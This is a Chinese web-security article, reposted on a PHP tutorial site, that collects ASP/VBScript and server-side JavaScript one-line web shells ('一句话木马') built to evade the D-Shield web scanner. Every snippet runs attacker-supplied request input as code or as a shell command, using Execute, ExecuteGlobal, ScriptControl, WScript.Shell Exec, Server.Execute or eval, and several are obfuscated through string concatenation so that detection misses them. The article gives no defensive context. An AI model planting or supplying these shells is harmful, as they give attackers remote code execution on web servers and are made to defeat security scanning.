网站地图    收藏   

主页 > 后端 > 网站安全 >

绕过D盾Web查杀的脚本木马 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 11:59 作者: 阅读:

[导读] 过D盾WEB查杀:%ExecuteGlobal(Request(test))%ExecuteGlobal D盾无提示不提示一句话,只提示Execute:%Execute(Request.Form(test))%%Dim oo=Request(test)Execute o%无耻的办法之一(利用了Exe......

过D盾WEB查杀:
<%
ExecuteGlobal(Request("test"))
%>
 
 
ExecuteGlobal D盾无提示
不提示一句话,只提示Execute:
<%Execute(Request.Form("test"))%>
 
<%
Dim o
o=Request("test")
Execute o
%>
 
无耻的办法之一(利用了ExecuteGlobal。当然,用Execute也不会提示一句话):
<%
ExecuteGlobal "E"&"X"&"E"&"C"&"U"&"T"&"E"&" "&"Request(""test"")"
%>
 
无耻的办法之二(同上):
<%
Dim o
Set o=Request
ExecuteGlobal(o("test"))
%>
 
无耻的办法之三:
<%
Dim o
o=Request("test")
Dim Script
Set Script=CreateObject("ScriptControl")
Script.language = "VBScript"
Script.AddCode o
Script.Run
%>
 
虽然玩不了ASP对象 不过那些FSO ADO啥还是能执行的
最无耻的办法之四(调用一个已经存在的exe):
Dim s
Set s=CreateObject("wscript.shell")
s.Exec Request("test")
 
最无耻的办法之五(动态调用一个asp文件)
<%
Server.Execute Request("test")
%>
 
接着<script runat="server">直接无视掉
<script language="javascript" runat="server">
//runat直接过查杀,这里写成vbscript也能过
eval(Request("test").Item);
</script>
 
本文来源于小E博客,本文地址:http://www.chinaxiaoe.com/sec/0410.html,转载请注明来处,谢谢。

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论